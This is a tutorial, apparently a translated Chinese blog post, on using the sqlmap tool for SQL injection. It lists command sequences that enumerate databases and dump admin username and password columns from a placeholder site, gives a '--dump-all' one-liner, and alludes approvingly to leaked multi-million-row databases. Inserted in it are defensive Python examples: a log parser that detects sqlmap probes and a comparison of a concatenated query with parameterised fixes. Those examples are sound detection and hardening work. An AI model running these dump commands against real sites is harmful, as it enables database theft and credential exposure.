"Security Tools": Sqlmap, the SQL injection power tool
0x 00 Preface
With a tool like sqlmap around, SQL injection becomes almost effortless....
PS: Similar tools from China include Ah D (啊D), Ming Xiaozi (明小子) and Excavator (挖掘机); once you have used those, you will find that sqlmap is the definitive injection tool.
0x 01 Injection principle
Start Split Line *****************************************
Due to time constraints, this part will not be written for now.
It is precisely because it is so important that I need to sort it out properly.
Although, to be honest, I still don't fully understand it myself :)
End Split Line *****************************************
0x 02 Installing Sqlmap
1. Install Python
Go to the official website https://www.python.org/ and download and install the latest version.
Because sqlmap is written in Python, it cannot run without a Python environment.
2. Install Sqlmap
Go to the official website http://sqlmap.org/ and download the latest version.
3. Set the environment variable
For convenience, add the sqlmap installation directory to the system PATH environment variable.
After that, sqlmap can be run directly from CMD.
If you do not set the environment variable, you have to change the current directory of CMD to the sqlmap installation directory before running it.
0x 03 Introduction to common sqlmap commands
1. sqlmap.py -u "http://www.XXX.com/index.asp?id=1"
Checks whether the id parameter is injectable: if the output contains "id is vulnerable", an injection point exists.
Only when an injection point exists can the following steps succeed ~
2. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --dbs
Enumerates all database names that can be listed.
3. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --current-db
Lists the database currently in use; assume it reports the "sqltest" database.
4. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --is-dba
Checks whether the injection point has administrator (DBA) rights: True means the database user is a DBA.
5. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" --tables
Gets all tables in sqltest; assume there is an "admin" table.
6. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" --columns
Lists the fields (column names) of admin; assume there are "username" and "password" fields.
7. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" -C "username,password" --dump
Dumps the values of the username and password fields; if asked whether to crack the MD5 hashes, choose No.
At this point, for a simple injection point (GET mode), we have obtained the data we wanted.
To watch the tool's injection process, use the -v parameter.
--level raises the test level (the default, 0, only checks whether the GET and POST parameters have an injection point).
If the injection point is in POST mode, or the injection point is in a cookie or User-Agent, use the --data and --cookie parameters to specify it.
Of course, using Burp Suite as a proxy to intercept the request and passing the saved request file with the -r parameter also covers all of the above cases ~
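Every one of the commands above produces a burst of requests that an Apache access log records, so the defender's side of this section is spotting them. The following is an added example, not code from the original post or from the sqlmap project: a small Apache combined-log parser that flags lines whose User-Agent is sqlmap's default banner or whose query string carries SQL tokens or quote characters, then tallies flagged lines per source IP. The log lines are constructed for the example, and the banner format "sqlmap/1.7 (https://sqlmap.org)" is assumed from sqlmap's default User-Agent, which the page does not quote.

```python
# Added example (not from the original post): flag sqlmap-style requests in
# Apache "combined" access logs. All sample data below is constructed.
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format.
SAMPLE_LOG = r'''
127.0.0.1 - - [10/Oct/2023:13:55:36 +0800] "GET /sqlinject.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Oct/2023:13:55:37 +0800] "GET /sqlinject.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
127.0.0.1 - - [10/Oct/2023:13:55:38 +0800] "GET /sqlinject.php?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 98 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:39 +0800] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

# One combined-format line: ip ident user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# SQL fragments that rarely belong in a legitimate query string.
SQL_TOKEN_RE = re.compile(
    r"\b(?:union\s+(?:all\s+)?select|sleep\s*\(|benchmark\s*\(|information_schema"
    r"|and\s+\d+\s*=\s*\d+|or\s+\d+\s*=\s*\d+)",
    re.IGNORECASE,
)


def analyze_line(line):
    """Parse one log line; return a dict with the reasons it looks suspicious (possibly empty)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    ua = m.group("ua")
    # sqlmap's default User-Agent starts with "sqlmap/" (assumed banner format).
    if ua.lower().startswith("sqlmap"):
        reasons.append("sqlmap user-agent")
    path = m.group("path")
    # Decode the query string so %27 / %20 do not hide the payload from the regex.
    decoded = unquote_plus(path.partition("?")[2])
    if SQL_TOKEN_RE.search(decoded):
        reasons.append("sql keywords in query string")
    if "'" in decoded or '"' in decoded:
        reasons.append("quote character in query string")
    return {"ip": m.group("ip"), "path": path, "ua": ua, "reasons": reasons}


def flag_suspicious(log_text):
    """Return the parsed records that triggered at least one indicator."""
    hits = []
    for line in log_text.strip().splitlines():
        info = analyze_line(line)
        if info and info["reasons"]:
            hits.append(info)
    return hits


def suspicious_ips(log_text, min_hits=2):
    """Source IPs with at least min_hits flagged lines: sqlmap fires many probes, not one."""
    counts = {}
    for hit in flag_suspicious(log_text):
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return {ip for ip, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    for hit in flag_suspicious(SAMPLE_LOG):
        print(hit["ip"], hit["path"], "->", ", ".join(hit["reasons"]))
    print("sources to review:", suspicious_ips(SAMPLE_LOG))
```

Note that the User-Agent check alone is weak, since sqlmap can be run with a custom or random User-Agent; the query-string indicators and the per-IP request count are what remain once the banner is changed.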
0x 04 Injection Demo
This demo uses an Apache + PHP + MySQL environment; for other environments
the sqlmap commands are exactly the same, which is what makes sqlmap so nice.
sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --dbs (lists all database names)
sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --current-db (lists the current database)
sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --is-dba (checks whether the injection point has administrator rights)
sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" --tables (guesses the table names)
sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" -T "test" --columns (guesses the field names)
sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" -T "test" -C "id,name" --dump (guesses the values of id and name)
The database-dumping ("tuoku") one-liner circulating on the Internet is the following:
sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" --dump-all
It suddenly strikes you that powerful things are often just a single line!!
This command dumps all the tables in the test database directly into the output folder under the installation directory.
And then there are the 2000W (20 million) row xxx, the 800W (8 million) row xxx ......... you know.
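The whole demo works only because sqlinject.php pastes the id parameter straight into its SQL text. The page does not show that PHP file, so the following is an added example, not code from the original post: a Python stand-in (SQLite in memory instead of the demo's MySQL, which is an assumption of the example) that puts the vulnerable query pattern beside two fixes, a parameterised query and input validation, and shows what each returns for a normal id and for a crafted one. Table and column names follow the demo's "test" table with "id" and "name"; the row contents are constructed.

```python
# Added example (not from the original post): the string-concatenated query that
# makes sqlinject.php dumpable, beside its hardened forms. Uses SQLite in memory
# as a stand-in for the demo's MySQL; table/column names follow the demo.
import sqlite3


def make_db():
    """Build the demo's 'test' table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO test (id, name) VALUES (?, ?)",
        [(1, "alice"), (2, "bob"), (3, "carol")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors "SELECT ... WHERE id=" . $_GET['id']: the input becomes part of the SQL."""
    sql = "SELECT id, name FROM test WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, user_id):
    """Fix 1: bound parameter. The driver passes the value separately from the SQL text,
    so 'id' is compared against the whole string and no new SQL is parsed."""
    return conn.execute("SELECT id, name FROM test WHERE id = ?", (user_id,)).fetchall()


def lookup_validated(conn, user_id):
    """Fix 2 (defence in depth): reject anything that is not an integer before it
    reaches the database at all, then still use a bound parameter."""
    try:
        id_value = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT id, name FROM test WHERE id = ?", (id_value,)).fetchall()


def compare(user_id):
    """Run the same input through all three lookups; returns the row counts."""
    conn = make_db()
    vulnerable = len(lookup_vulnerable(conn, user_id))
    parameterised = len(lookup_parameterised(conn, user_id))
    try:
        validated = len(lookup_validated(conn, user_id))
    except ValueError:
        validated = "rejected"
    conn.close()
    return {"vulnerable": vulnerable, "parameterised": parameterised, "validated": validated}


if __name__ == "__main__":
    # A normal request and the kind of always-true condition sqlmap uses in its
    # boolean-based probe: only the concatenated version changes its answer.
    for value in ("1", "1 OR 1=1"):
        print(repr(value), "->", compare(value))
```

The `1 OR 1=1` case is the same boolean-based check sqlmap runs automatically when it reports "id is vulnerable": if a true condition returns more rows than the plain request, the parameter is injectable. Against the parameterised query the crafted string is just a value that matches no integer id, and the validating version never sends it to the database.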